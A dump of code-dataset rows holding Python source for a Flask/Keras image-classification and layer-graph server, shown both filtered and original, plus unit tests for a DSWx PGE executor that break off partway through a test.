hexsha stringlengths 40 40 | size int64 7 1.04M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 247 | max_stars_repo_name stringlengths 4 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 368k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 247 | max_issues_repo_name stringlengths 4 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 247 | max_forks_repo_name stringlengths 4 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.04M | avg_line_length float64 1.77 618k | max_line_length int64 1 1.02M | alphanum_fraction float64 0 1 | original_content stringlengths 7 1.04M | filtered:remove_function_no_docstring int64 -102 942k | filtered:remove_class_no_docstring int64 -354 977k | filtered:remove_delete_markers int64 0 60.1k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a1ea56f577e661c06c35585252ddea30eee3b5fd | 10,621 | py | Python | run_keras_server.py | DLVIsualizer/dlvis-flask | e1e22028b2d57fb894d105bd716437a3de8e4e7f | [
"MIT"
] | null | null | null | run_keras_server.py | DLVIsualizer/dlvis-flask | e1e22028b2d57fb894d105bd716437a3de8e4e7f | [
"MIT"
] | 13 | 2020-01-28T22:20:14.000Z | 2022-03-11T23:20:14.000Z | run_keras_server.py | DLVIsualizer/dlvis-flask | e1e22028b2d57fb894d105bd716437a3de8e4e7f | [
"MIT"
] | null | null | null | # # USAGE
# # Start the server:
# # python run_keras_server.py
# # Submit a request via cURL:
# # curl -X POST -F image=@dog.jpg 'http://localhost:5000/predict'
# # Submita a request via Python:
# # python simple_request.py
#
# # import the necessary packages
# from flask_cors import CORS, cross_origin
# from keras.applications import ResNet50
# from keras.applications import InceptionV3
# from keras.preprocessing.image import img_to_array
# from keras.applications import imagenet_utils
# from PIL import Image
# from constants import MODELS
# import numpy as np
# import flask
# import io
# import json
#
# # initialize our Flask application and the Keras model
# app = flask.Flask(__name__)
# cors = CORS(app)
#
# resnetModel = ResNet50(weights="imagenet")
# inceptionV3Model = InceptionV3(weights="imagenet")
#
# # def load_model():
# # load the pre-trained Keras model (here we are using a model
# # pre-trained on ImageNet and provided by Keras, but you can
# # substitute in your own networks just as easily)
# # global model
# # model = ResNet50(weights="imagenet")
#
# def prepare_image(image, target):
# # if the image mode is not RGB, convert it
# if image.mode != "RGB":
# image = image.convert("RGB")
#
# # resize the input image and preprocess it
# image = image.resize(target)
# image = img_to_array(image)
# image = np.expand_dims(image, axis=0)
# image = imagenet_utils.preprocess_input(image)
#
# # return the processed image
# return image
#
#
# def build_html_with_layer(layer):
# layer_class = layer['class_name']
# layer_config = layer['config']
# html = ""
#
# if layer_class == 'InputLayer':
# html = "input shape " + str(layer_config['batch_input_shape']) + "<br>"
# elif layer_class == 'ZeroPadding2D':
# html = "padding " + str(layer_config['padding']) + "<br>"
# elif layer_class == 'Conv2D':
# html = "filters " + str(layer_config['filters']) + "<br>" \
# "kernel size " + str(layer_config['kernel_size']) + "<br>" \
# "strides " + str(
# layer_config['strides']) + "<br>"
# elif layer_class == 'BatchNormalization':
# html = ""
# elif layer_class == 'Activation':
# html = "activation func</b> " + str(layer_config['activation'])
# elif layer_class == 'MaxPooling2D':
# html = "pool size " + str(layer_config['pool_size']) + "<br>" \
# "strides " + str(layer_config['strides']) + "<br>"
#
# return html
#
#
# def create_model_graph(layers):
# data = []
# tooltip = {}
# links = []
# for idx in range(1, len(layers)):
# links.append({
# "source": idx - 1,
# "target": idx
# })
#
# for idx, layer in enumerate(layers):
# flag = False
# prior_node = ""
#
# inbound_nodes = layer["inbound_nodes"]
#
# if len(inbound_nodes) != 0:
# for inbound_node in inbound_nodes[0]:
# if inbound_node[0] != data[len(data)-1]["name"]:
# flag = True
# prior_node = inbound_node[0]
# break
# else:
# break
#
# if flag is True:
# for d in data:
# if d["name"] == prior_node:
# data.append({
# "name": layer['name'],
# "x": d["x"] + 1200,
# "y": d["y"],
# "value": layer['class_name']
# })
# else:
# data.append({
# "name": layer['name'],
# "x": 500,
# "y": idx * 200,
# "value": layer['class_name']
# })
#
# tooltip[layer['name']] = build_html_with_layer(layer)
#
#
#
# model_graph = {
# "graph": {
# "data": data,
# "links": links
# },
# "tooltip": tooltip
# }
#
# return model_graph
#
#
# @app.route("/predict", methods=["POST"])
# def predict():
# # initialize the data dictionary that will be returned from the
# # view
# data = {"success": False}
#
# # ensure an image was properly uploaded to our endpoint
# if flask.request.method == "POST":
# if flask.request.files.get("image"):
# # read the image in PIL format
# image = flask.request.files["image"].read()
# image = Image.open(io.BytesIO(image))
#
# # preprocess the image and prepare it for classification
# image = prepare_image(image, target=(224, 224))
#
# # classify the input image and then initialize the list
# # of predictions to return to the client
# preds = resnetModel.predict(image)
# results = imagenet_utils.decode_predictions(preds)
# data["predictions"] = []
#
# # loop over the results and add them to the list of
# # returned predictions
# for (imagenetID, label, prob) in results[0]:
# r = {"label": label, "probability": float(prob)}
# data["predictions"].append(r)
#
# # indicate that the request was a success
# data["success"] = True
#
# # return the data dictionary as a JSON response
# return flask.jsonify(data)
#
#
# @app.route("/layers/<int:model_id>", methods=["GET"])
# @cross_origin()
# def layers(model_id):
#
# if model_id == MODELS['ResNet50']:
# jmodel = json.loads(resnetModel.to_json())
# elif model_id == MODELS['InceptionV3']:
# jmodel = json.loads(inceptionV3Model.to_json())
# else:
# return ('',204) # No Content
#
# layers = jmodel["config"]["layers"]
#
# # print(json.dumps(layers, indent=2, sort_keys=True))
#
# model_graph = create_model_graph(layers)
# # print(json.dumps(model_graph, indent=2, sort_keys=True))
# return flask.jsonify(model_graph)
#
#
# # if this is the main thread of execution first load the model and
# # then start the server
# if __name__ == "__main__":
# print(("* Loading Keras model and Flask starting server..."
# "please wait until server has fully started"))
# app.run()
# USAGE
# Start the server:
# python run_keras_server.py
# Submit a request via cURL:
# curl -X POST -F image=@dog.jpg 'http://localhost:5000/predict'
# Submita a request via Python:
# python simple_request.py
# import the necessary packages
from flask_cors import CORS, cross_origin
from constants import MODELS
from keras.applications import ResNet50
from keras.applications import InceptionV3
from keras.preprocessing.image import img_to_array
from keras.applications import imagenet_utils
from PIL import Image
import numpy as np
import flask
import io
import json
import requests
# initialize our Flask application and the Keras model
app = flask.Flask(__name__)
cors = CORS(app)
# PBW: 0505_18
MODEL_ID_RESNET = 'ResNet50'
MODEL_ID_INCEPTIONV3 = 'InceptionV3'
currentModel = 0 # model pointer
resnetModel = ResNet50(weights="imagenet")
inceptionV3Model = InceptionV3(weights="imagenet")
# def load_model():
# load the pre-trained Keras model (here we are using a model
# pre-trained on ImageNet and provided by Keras, but you can
# substitute in your own networks just as easily)
# global model
# model = ResNet50(weights="imagenet")
@app.route("/predict", methods=["POST"])
@app.route("/layers/<int:model_id>", methods=["GET"])
@cross_origin()
# if this is the main thread of execution first load the model and
# then start the server
if __name__ == "__main__":
print(("* Loading Keras model and Flask starting server..."
"please wait until server has fully started"))
app.run() | 28.940054 | 124 | 0.654364 | # # USAGE
# # Start the server:
# # python run_keras_server.py
# # Submit a request via cURL:
# # curl -X POST -F image=@dog.jpg 'http://localhost:5000/predict'
# # Submita a request via Python:
# # python simple_request.py
#
# # import the necessary packages
# from flask_cors import CORS, cross_origin
# from keras.applications import ResNet50
# from keras.applications import InceptionV3
# from keras.preprocessing.image import img_to_array
# from keras.applications import imagenet_utils
# from PIL import Image
# from constants import MODELS
# import numpy as np
# import flask
# import io
# import json
#
# # initialize our Flask application and the Keras model
# app = flask.Flask(__name__)
# cors = CORS(app)
#
# resnetModel = ResNet50(weights="imagenet")
# inceptionV3Model = InceptionV3(weights="imagenet")
#
# # def load_model():
# # load the pre-trained Keras model (here we are using a model
# # pre-trained on ImageNet and provided by Keras, but you can
# # substitute in your own networks just as easily)
# # global model
# # model = ResNet50(weights="imagenet")
#
# def prepare_image(image, target):
# # if the image mode is not RGB, convert it
# if image.mode != "RGB":
# image = image.convert("RGB")
#
# # resize the input image and preprocess it
# image = image.resize(target)
# image = img_to_array(image)
# image = np.expand_dims(image, axis=0)
# image = imagenet_utils.preprocess_input(image)
#
# # return the processed image
# return image
#
#
# def build_html_with_layer(layer):
# layer_class = layer['class_name']
# layer_config = layer['config']
# html = ""
#
# if layer_class == 'InputLayer':
# html = "input shape " + str(layer_config['batch_input_shape']) + "<br>"
# elif layer_class == 'ZeroPadding2D':
# html = "padding " + str(layer_config['padding']) + "<br>"
# elif layer_class == 'Conv2D':
# html = "filters " + str(layer_config['filters']) + "<br>" \
# "kernel size " + str(layer_config['kernel_size']) + "<br>" \
# "strides " + str(
# layer_config['strides']) + "<br>"
# elif layer_class == 'BatchNormalization':
# html = ""
# elif layer_class == 'Activation':
# html = "activation func</b> " + str(layer_config['activation'])
# elif layer_class == 'MaxPooling2D':
# html = "pool size " + str(layer_config['pool_size']) + "<br>" \
# "strides " + str(layer_config['strides']) + "<br>"
#
# return html
#
#
# def create_model_graph(layers):
# data = []
# tooltip = {}
# links = []
# for idx in range(1, len(layers)):
# links.append({
# "source": idx - 1,
# "target": idx
# })
#
# for idx, layer in enumerate(layers):
# flag = False
# prior_node = ""
#
# inbound_nodes = layer["inbound_nodes"]
#
# if len(inbound_nodes) != 0:
# for inbound_node in inbound_nodes[0]:
# if inbound_node[0] != data[len(data)-1]["name"]:
# flag = True
# prior_node = inbound_node[0]
# break
# else:
# break
#
# if flag is True:
# for d in data:
# if d["name"] == prior_node:
# data.append({
# "name": layer['name'],
# "x": d["x"] + 1200,
# "y": d["y"],
# "value": layer['class_name']
# })
# else:
# data.append({
# "name": layer['name'],
# "x": 500,
# "y": idx * 200,
# "value": layer['class_name']
# })
#
# tooltip[layer['name']] = build_html_with_layer(layer)
#
#
#
# model_graph = {
# "graph": {
# "data": data,
# "links": links
# },
# "tooltip": tooltip
# }
#
# return model_graph
#
#
# @app.route("/predict", methods=["POST"])
# def predict():
# # initialize the data dictionary that will be returned from the
# # view
# data = {"success": False}
#
# # ensure an image was properly uploaded to our endpoint
# if flask.request.method == "POST":
# if flask.request.files.get("image"):
# # read the image in PIL format
# image = flask.request.files["image"].read()
# image = Image.open(io.BytesIO(image))
#
# # preprocess the image and prepare it for classification
# image = prepare_image(image, target=(224, 224))
#
# # classify the input image and then initialize the list
# # of predictions to return to the client
# preds = resnetModel.predict(image)
# results = imagenet_utils.decode_predictions(preds)
# data["predictions"] = []
#
# # loop over the results and add them to the list of
# # returned predictions
# for (imagenetID, label, prob) in results[0]:
# r = {"label": label, "probability": float(prob)}
# data["predictions"].append(r)
#
# # indicate that the request was a success
# data["success"] = True
#
# # return the data dictionary as a JSON response
# return flask.jsonify(data)
#
#
# @app.route("/layers/<int:model_id>", methods=["GET"])
# @cross_origin()
# def layers(model_id):
#
# if model_id == MODELS['ResNet50']:
# jmodel = json.loads(resnetModel.to_json())
# elif model_id == MODELS['InceptionV3']:
# jmodel = json.loads(inceptionV3Model.to_json())
# else:
# return ('',204) # No Content
#
# layers = jmodel["config"]["layers"]
#
# # print(json.dumps(layers, indent=2, sort_keys=True))
#
# model_graph = create_model_graph(layers)
# # print(json.dumps(model_graph, indent=2, sort_keys=True))
# return flask.jsonify(model_graph)
#
#
# # if this is the main thread of execution first load the model and
# # then start the server
# if __name__ == "__main__":
# print(("* Loading Keras model and Flask starting server..."
# "please wait until server has fully started"))
# app.run()
# USAGE
# Start the server:
# python run_keras_server.py
# Submit a request via cURL:
# curl -X POST -F image=@dog.jpg 'http://localhost:5000/predict'
# Submita a request via Python:
# python simple_request.py
# import the necessary packages
from flask_cors import CORS, cross_origin
from constants import MODELS
from keras.applications import ResNet50
from keras.applications import InceptionV3
from keras.preprocessing.image import img_to_array
from keras.applications import imagenet_utils
from PIL import Image
import numpy as np
import flask
import io
import json
import requests
# initialize our Flask application and the Keras model
app = flask.Flask(__name__)
cors = CORS(app)
# PBW: 0505_18
MODEL_ID_RESNET = 'ResNet50'
MODEL_ID_INCEPTIONV3 = 'InceptionV3'
currentModel = 0 # model pointer
resnetModel = ResNet50(weights="imagenet")
inceptionV3Model = InceptionV3(weights="imagenet")
# def load_model():
# load the pre-trained Keras model (here we are using a model
# pre-trained on ImageNet and provided by Keras, but you can
# substitute in your own networks just as easily)
# global model
# model = ResNet50(weights="imagenet")
def prepare_image(image, target):
# if the image mode is not RGB, convert it
if image.mode != "RGB":
image = image.convert("RGB")
# resize the input image and preprocess it
image = image.resize(target)
image = img_to_array(image)
image = np.expand_dims(image, axis=0)
image = imagenet_utils.preprocess_input(image)
# return the processed image
return image
def build_html_with_layer(layer):
layer_class = layer['class_name']
layer_config = layer['config']
html = ""
print(json.dumps(layer_config, indent=2, sort_keys=True))
if layer_class == 'InputLayer':
html = "input shape " + str(layer_config['batch_input_shape']) + "<br>"
elif layer_class == 'ZeroPadding2D':
html = "padding " + str(layer_config['padding']) + "<br>"
elif layer_class == 'Conv2D':
html = "filters " + str(layer_config['filters']) + "<br>" \
"kernel size " + str(layer_config['kernel_size']) + "<br>" \
"strides " + str(
layer_config['strides']) + "<br>"
elif layer_class == 'BatchNormalization':
html = ""
elif layer_class == 'Activation':
html = "activation func</b> " + str(layer_config['activation'])
elif layer_class == 'MaxPooling2D':
html = "pool size " + str(layer_config['pool_size']) + "<br>" \
"strides " + str(layer_config['strides']) + "<br>"
return html
def create_model_graph(layers):
data = []
tooltip = {}
for idx, layer in enumerate(layers):
data.append({
"name": layer['name'],
"x": 500,
"y": idx * 200,
"value": layer['class_name']
})
tooltip[layer['name']] = build_html_with_layer(layer)
links = []
for idx in range(1, len(layers)):
links.append({
"source": idx - 1,
"target": idx
})
model_graph = {
"graph": {
"data": data,
"links": links
},
"tooltip": tooltip
}
return model_graph
@app.route("/predict", methods=["POST"])
def predict():
# initialize the data dictionary that will be returned from the
# view
data = {"success": False}
# ensure an image was properly uploaded to our endpoint
if flask.request.method == "POST":
if flask.request.files.get("image"):
# read the image in PIL format
image = flask.request.files["image"].read()
image = Image.open(io.BytesIO(image))
# preprocess the image and prepare it for classification
image = prepare_image(image, target=(224, 224))
# classify the input image and then initialize the list
# of predictions to return to the client
preds = resnetModel.predict(image)
results = imagenet_utils.decode_predictions(preds)
data["predictions"] = []
# loop over the results and add them to the list of
# returned predictions
for (imagenetID, label, prob) in results[0]:
r = {"label": label, "probability": float(prob)}
data["predictions"].append(r)
# indicate that the request was a success
data["success"] = True
# return the data dictionary as a JSON response
return flask.jsonify(data)
@app.route("/layers/<int:model_id>", methods=["GET"])
@cross_origin()
def layers(model_id):
if model_id == MODELS['ResNet50']:
jmodel = json.loads(resnetModel.to_json())
elif model_id == MODELS['InceptionV3']:
jmodel = json.loads(inceptionV3Model.to_json())
else:
return ('',204) # No Content
jmodel = requests.get('127.0.0.1:5001')
layers = jmodel["config"]["layers"]
# print(json.dumps(layers, indent=2, sort_keys=True))
model_graph = create_model_graph(layers)
# print(json.dumps(model_graph, indent=2, sort_keys=True))
return flask.jsonify(model_graph)
# if this is the main thread of execution first load the model and
# then start the server
if __name__ == "__main__":
print(("* Loading Keras model and Flask starting server..."
"please wait until server has fully started"))
app.run() | 3,302 | 0 | 113 |
0772436cb9af65982f99dcfc7bcb93f6712d13ce | 11,335 | py | Python | src/opera/test/pge/test_dswx_pge.py | drewmee/opera-sds-pge | ab6e1a9d872a72b74d5b9c096ab788809f76d32d | [
"Apache-2.0"
] | null | null | null | src/opera/test/pge/test_dswx_pge.py | drewmee/opera-sds-pge | ab6e1a9d872a72b74d5b9c096ab788809f76d32d | [
"Apache-2.0"
] | null | null | null | src/opera/test/pge/test_dswx_pge.py | drewmee/opera-sds-pge | ab6e1a9d872a72b74d5b9c096ab788809f76d32d | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
#
# Copyright 2021, by the California Institute of Technology.
# ALL RIGHTS RESERVED.
# United States Government sponsorship acknowledged.
# Any commercial use must be negotiated with the Office of Technology Transfer
# at the California Institute of Technology.
# This software may be subject to U.S. export control laws and regulations.
# By accepting this document, the user agrees to comply with all applicable
# U.S. export laws and regulations. User has the responsibility to obtain
# export licenses, or other export authority as may be required, before
# exporting such information to foreign countries or providing access to
# foreign persons.
#
"""
================
test_dswx_pge.py
================
Unit tests for the pge/dswx_pge.py module.
"""
import os
import tempfile
import unittest
from io import StringIO
from os.path import abspath, join
from pkg_resources import resource_filename
import yaml
from opera.pge import DSWxExecutor, RunConfig
from opera.util import PgeLogger
class DSWxPgeTestCase(unittest.TestCase):
"""Base test class using unittest"""
starting_dir = None
working_dir = None
test_dir = None
input_file = None
@classmethod
def setUpClass(cls) -> None:
"""Set up directories and files for testing"""
cls.starting_dir = abspath(os.curdir)
cls.test_dir = resource_filename(__name__, "")
cls.data_dir = join(cls.test_dir, "data")
os.chdir(cls.test_dir)
cls.working_dir = tempfile.TemporaryDirectory(
prefix="test_dswx_pge_", suffix='_temp', dir=os.curdir
)
# Create the input dir expected by the test RunConfig and add a dummy
# input file for validation
input_dir = join(cls.working_dir.name, "dswx_pge_test/input_dir")
os.makedirs(input_dir, exist_ok=True)
cls.input_file = tempfile.NamedTemporaryFile(
dir=input_dir, prefix="test_input", suffix=".tif")
@classmethod
def tearDownClass(cls) -> None:
"""At completion re-establish starting directory"""
cls.input_file.close()
cls.working_dir.cleanup()
os.chdir(cls.starting_dir)
def setUp(self) -> None:
"""Use the temporary directory as the working directory"""
os.chdir(self.working_dir.name)
def tearDown(self) -> None:
"""Return to starting directory"""
os.chdir(self.test_dir)
def test_dswx_pge_execution(self):
"""
Test execution of the DSWxExecutor class and its associated mixins using
a test RunConfig that creates a dummy expected output file and logs a
message to be captured by PgeLogger.
"""
runconfig_path = join(self.data_dir, 'test_dswx_hls_config.yaml')
pge = DSWxExecutor(pge_name="DSWxPgeTest", runconfig_path=runconfig_path)
# Check that basic attributes were initialized
self.assertEqual(pge.name, "DSWx")
self.assertEqual(pge.pge_name, "DSWxPgeTest")
self.assertEqual(pge.runconfig_path, runconfig_path)
# Check that other objects have not been instantiated yet
self.assertIsNone(pge.runconfig)
self.assertIsNone(pge.logger)
# Kickoff execution of DSWx PGE
pge.run()
# Check that the runconfig and logger were instantiated
self.assertIsInstance(pge.runconfig, RunConfig)
self.assertIsInstance(pge.logger, PgeLogger)
# Check that directories were created according to RunConfig
self.assertTrue(os.path.isdir(pge.runconfig.output_product_path))
self.assertTrue(os.path.isdir(pge.runconfig.scratch_path))
# Check that a in-memory log was created
stream = pge.logger.get_stream_object()
self.assertTrue(isinstance(stream, StringIO))
# Check that a RunConfig for the SAS was isolated within the scratch directory
expected_sas_config_file = join(pge.runconfig.scratch_path, 'test_dswx_hls_config_sas.yaml')
self.assertTrue(os.path.exists(expected_sas_config_file))
# Check that the log file was created and moved into the output directory
expected_log_file = join(pge.runconfig.output_product_path, pge.logger.get_file_name())
self.assertTrue(os.path.exists(expected_log_file))
# Open and read the log
with open(expected_log_file, 'r', encoding='utf-8') as infile:
log_contents = infile.read()
self.assertIn(f"DSWx-HLS invoked with RunConfig {expected_sas_config_file}", log_contents)
def test_dswx_pge_input_validation(self):
"""Test the input validation checks made by DSWxPreProcessorMixin."""
runconfig_path = join(self.data_dir, 'test_dswx_hls_config.yaml')
test_runconfig_path = join(self.data_dir, 'invalid_dswx_runconfig.yaml')
with open(runconfig_path, 'r', encoding='utf-8') as stream:
runconfig_dict = yaml.safe_load(stream)
input_files_group = runconfig_dict['RunConfig']['Groups']['PGE']['InputFilesGroup']
# Test that a non-existent file is detected by pre-processor
input_files_group['InputFilePaths'] = ['non_existent_file.tif']
with open(test_runconfig_path, 'w', encoding='utf-8') as input_path:
yaml.safe_dump(runconfig_dict, input_path, sort_keys=False)
try:
pge = DSWxExecutor(pge_name="DSWxPgeTest", runconfig_path=test_runconfig_path)
with self.assertRaises(RuntimeError):
pge.run()
# Config validation occurs before the log is fully initialized, but the
# initial log file should still exist and contain details of the validation
# error
expected_log_file = pge.logger.get_file_name()
self.assertTrue(os.path.exists(expected_log_file))
# Open the log file, and check that the validation error details were captured
with open(expected_log_file, 'r', encoding='utf-8') as infile:
log_contents = infile.read()
self.assertIn(f"Could not locate specified input file/directory "
f"{abspath('non_existent_file.tif')}", log_contents)
# Test that an input directory with no .tif files is caught
input_files_group['InputFilePaths'] = ['dswx_pge_test/scratch_dir']
with open(test_runconfig_path, 'w', encoding='utf-8') as out_file:
yaml.safe_dump(runconfig_dict, out_file, sort_keys=False)
pge = DSWxExecutor(pge_name="DSWxPgeTest", runconfig_path=test_runconfig_path)
with self.assertRaises(RuntimeError):
pge.run()
expected_log_file = pge.logger.get_file_name()
self.assertTrue(os.path.exists(expected_log_file))
with open(expected_log_file, 'r', encoding='utf-8') as infile:
log_contents = infile.read()
self.assertIn(f"Input directory {abspath('dswx_pge_test/scratch_dir')} "
f"does not contain any tif files", log_contents)
# Lastly, check that a file that exists but is not a tif is caught
input_files_group['InputFilePaths'] = [runconfig_path]
with open(test_runconfig_path, 'w', encoding='utf-8') as runconfig_fh:
yaml.safe_dump(runconfig_dict, runconfig_fh, sort_keys=False)
pge = DSWxExecutor(pge_name="DSWxPgeTest", runconfig_path=test_runconfig_path)
with self.assertRaises(RuntimeError):
pge.run()
expected_log_file = pge.logger.get_file_name()
self.assertTrue(os.path.exists(expected_log_file))
with open(expected_log_file, 'r', encoding='utf-8') as infile:
log_contents = infile.read()
self.assertIn(f"Input file {abspath(runconfig_path)} does not have "
f".tif extension", log_contents)
finally:
if os.path.exists(test_runconfig_path):
os.unlink(test_runconfig_path)
def test_dswx_pge_output_validation(self):
"""Test the output validation checks made by DSWxPostProcessorMixin."""
runconfig_path = join(self.data_dir, 'test_dswx_hls_config.yaml')
test_runconfig_path = join(self.data_dir, 'invalid_dswx_runconfig.yaml')
with open(runconfig_path, 'r', encoding='utf-8') as stream:
runconfig_dict = yaml.safe_load(stream)
product_path_group = runconfig_dict['RunConfig']['Groups']['PGE']['ProductPathGroup']
primary_executable_group = runconfig_dict['RunConfig']['Groups']['PGE']['PrimaryExecutable']
# Test with a SAS command that does not produce any output file,
# post-processor should detect that expected output is missing
product_path_group['SASOutputFile'] = 'missing_dswx_hls.tif'
primary_executable_group['ProgramPath'] = 'echo'
primary_executable_group['ProgramOptions'] = ['hello world']
with open(test_runconfig_path, 'w', encoding='utf-8') as config_fh:
yaml.safe_dump(runconfig_dict, config_fh, sort_keys=False)
try:
pge = DSWxExecutor(pge_name="DSWxPgeTest", runconfig_path=test_runconfig_path)
with self.assertRaises(RuntimeError):
pge.run()
expected_output_file = 'dswx_pge_test/output_dir/missing_dswx_hls.tif'
self.assertFalse(os.path.exists(expected_output_file))
expected_log_file = pge.logger.get_file_name()
self.assertTrue(os.path.exists(expected_log_file))
with open(expected_log_file, 'r', encoding='utf-8') as infile:
log_contents = infile.read()
self.assertIn(f"Expected SAS output file {abspath(expected_output_file)} "
f"does not exist", log_contents)
# Test with a SAS command that produces the expected output file, but
# one that is empty (size 0 bytes). Post-processor should detect this
# and flag an error
product_path_group['SASOutputFile'] = 'empty_dswx_hls.tif'
primary_executable_group['ProgramPath'] = 'touch'
primary_executable_group['ProgramOptions'] = ['dswx_pge_test/output_dir/empty_dswx_hls.tif']
with open(test_runconfig_path, 'w', encoding='utf-8') as outfile:
yaml.safe_dump(runconfig_dict, outfile, sort_keys=False)
pge = DSWxExecutor(pge_name="DSWxPgeTest", runconfig_path=test_runconfig_path)
with self.assertRaises(RuntimeError):
pge.run()
expected_output_file = 'dswx_pge_test/output_dir/empty_dswx_hls.tif'
self.assertTrue(os.path.exists(expected_output_file))
expected_log_file = pge.logger.get_file_name()
self.assertTrue(os.path.exists(expected_log_file))
with open(expected_log_file, 'r', encoding='utf-8') as infile:
log_contents = infile.read()
self.assertIn(f"SAS output file {abspath(expected_output_file)} was "
f"created but is empty", log_contents)
finally:
if os.path.exists(test_runconfig_path):
os.unlink(test_runconfig_path)
if __name__ == "__main__":
unittest.main()
| 40.62724 | 104 | 0.66749 | #!/usr/bin/env python3
#
# Copyright 2021, by the California Institute of Technology.
# ALL RIGHTS RESERVED.
# United States Government sponsorship acknowledged.
# Any commercial use must be negotiated with the Office of Technology Transfer
# at the California Institute of Technology.
# This software may be subject to U.S. export control laws and regulations.
# By accepting this document, the user agrees to comply with all applicable
# U.S. export laws and regulations. User has the responsibility to obtain
# export licenses, or other export authority as may be required, before
# exporting such information to foreign countries or providing access to
# foreign persons.
#
"""
================
test_dswx_pge.py
================
Unit tests for the pge/dswx_pge.py module.
"""
import os
import tempfile
import unittest
from io import StringIO
from os.path import abspath, join
from pkg_resources import resource_filename
import yaml
from opera.pge import DSWxExecutor, RunConfig
from opera.util import PgeLogger
class DSWxPgeTestCase(unittest.TestCase):
"""Base test class using unittest"""
starting_dir = None
working_dir = None
test_dir = None
input_file = None
@classmethod
def setUpClass(cls) -> None:
"""Set up directories and files for testing"""
cls.starting_dir = abspath(os.curdir)
cls.test_dir = resource_filename(__name__, "")
cls.data_dir = join(cls.test_dir, "data")
os.chdir(cls.test_dir)
cls.working_dir = tempfile.TemporaryDirectory(
prefix="test_dswx_pge_", suffix='_temp', dir=os.curdir
)
# Create the input dir expected by the test RunConfig and add a dummy
# input file for validation
input_dir = join(cls.working_dir.name, "dswx_pge_test/input_dir")
os.makedirs(input_dir, exist_ok=True)
cls.input_file = tempfile.NamedTemporaryFile(
dir=input_dir, prefix="test_input", suffix=".tif")
@classmethod
def tearDownClass(cls) -> None:
"""At completion re-establish starting directory"""
cls.input_file.close()
cls.working_dir.cleanup()
os.chdir(cls.starting_dir)
def setUp(self) -> None:
"""Use the temporary directory as the working directory"""
os.chdir(self.working_dir.name)
def tearDown(self) -> None:
"""Return to starting directory"""
os.chdir(self.test_dir)
def test_dswx_pge_execution(self):
"""
Test execution of the DSWxExecutor class and its associated mixins using
a test RunConfig that creates a dummy expected output file and logs a
message to be captured by PgeLogger.
"""
runconfig_path = join(self.data_dir, 'test_dswx_hls_config.yaml')
pge = DSWxExecutor(pge_name="DSWxPgeTest", runconfig_path=runconfig_path)
# Check that basic attributes were initialized
self.assertEqual(pge.name, "DSWx")
self.assertEqual(pge.pge_name, "DSWxPgeTest")
self.assertEqual(pge.runconfig_path, runconfig_path)
# Check that other objects have not been instantiated yet
self.assertIsNone(pge.runconfig)
self.assertIsNone(pge.logger)
# Kickoff execution of DSWx PGE
pge.run()
# Check that the runconfig and logger were instantiated
self.assertIsInstance(pge.runconfig, RunConfig)
self.assertIsInstance(pge.logger, PgeLogger)
# Check that directories were created according to RunConfig
self.assertTrue(os.path.isdir(pge.runconfig.output_product_path))
self.assertTrue(os.path.isdir(pge.runconfig.scratch_path))
# Check that a in-memory log was created
stream = pge.logger.get_stream_object()
self.assertTrue(isinstance(stream, StringIO))
# Check that a RunConfig for the SAS was isolated within the scratch directory
expected_sas_config_file = join(pge.runconfig.scratch_path, 'test_dswx_hls_config_sas.yaml')
self.assertTrue(os.path.exists(expected_sas_config_file))
# Check that the log file was created and moved into the output directory
expected_log_file = join(pge.runconfig.output_product_path, pge.logger.get_file_name())
self.assertTrue(os.path.exists(expected_log_file))
# Open and read the log
with open(expected_log_file, 'r', encoding='utf-8') as infile:
log_contents = infile.read()
self.assertIn(f"DSWx-HLS invoked with RunConfig {expected_sas_config_file}", log_contents)
def test_dswx_pge_input_validation(self):
"""Test the input validation checks made by DSWxPreProcessorMixin."""
runconfig_path = join(self.data_dir, 'test_dswx_hls_config.yaml')
test_runconfig_path = join(self.data_dir, 'invalid_dswx_runconfig.yaml')
with open(runconfig_path, 'r', encoding='utf-8') as stream:
runconfig_dict = yaml.safe_load(stream)
input_files_group = runconfig_dict['RunConfig']['Groups']['PGE']['InputFilesGroup']
# Test that a non-existent file is detected by pre-processor
input_files_group['InputFilePaths'] = ['non_existent_file.tif']
with open(test_runconfig_path, 'w', encoding='utf-8') as input_path:
yaml.safe_dump(runconfig_dict, input_path, sort_keys=False)
try:
pge = DSWxExecutor(pge_name="DSWxPgeTest", runconfig_path=test_runconfig_path)
with self.assertRaises(RuntimeError):
pge.run()
# Config validation occurs before the log is fully initialized, but the
# initial log file should still exist and contain details of the validation
# error
expected_log_file = pge.logger.get_file_name()
self.assertTrue(os.path.exists(expected_log_file))
# Open the log file, and check that the validation error details were captured
with open(expected_log_file, 'r', encoding='utf-8') as infile:
log_contents = infile.read()
self.assertIn(f"Could not locate specified input file/directory "
f"{abspath('non_existent_file.tif')}", log_contents)
# Test that an input directory with no .tif files is caught
input_files_group['InputFilePaths'] = ['dswx_pge_test/scratch_dir']
with open(test_runconfig_path, 'w', encoding='utf-8') as out_file:
yaml.safe_dump(runconfig_dict, out_file, sort_keys=False)
pge = DSWxExecutor(pge_name="DSWxPgeTest", runconfig_path=test_runconfig_path)
with self.assertRaises(RuntimeError):
pge.run()
expected_log_file = pge.logger.get_file_name()
self.assertTrue(os.path.exists(expected_log_file))
with open(expected_log_file, 'r', encoding='utf-8') as infile:
log_contents = infile.read()
self.assertIn(f"Input directory {abspath('dswx_pge_test/scratch_dir')} "
f"does not contain any tif files", log_contents)
# Lastly, check that a file that exists but is not a tif is caught
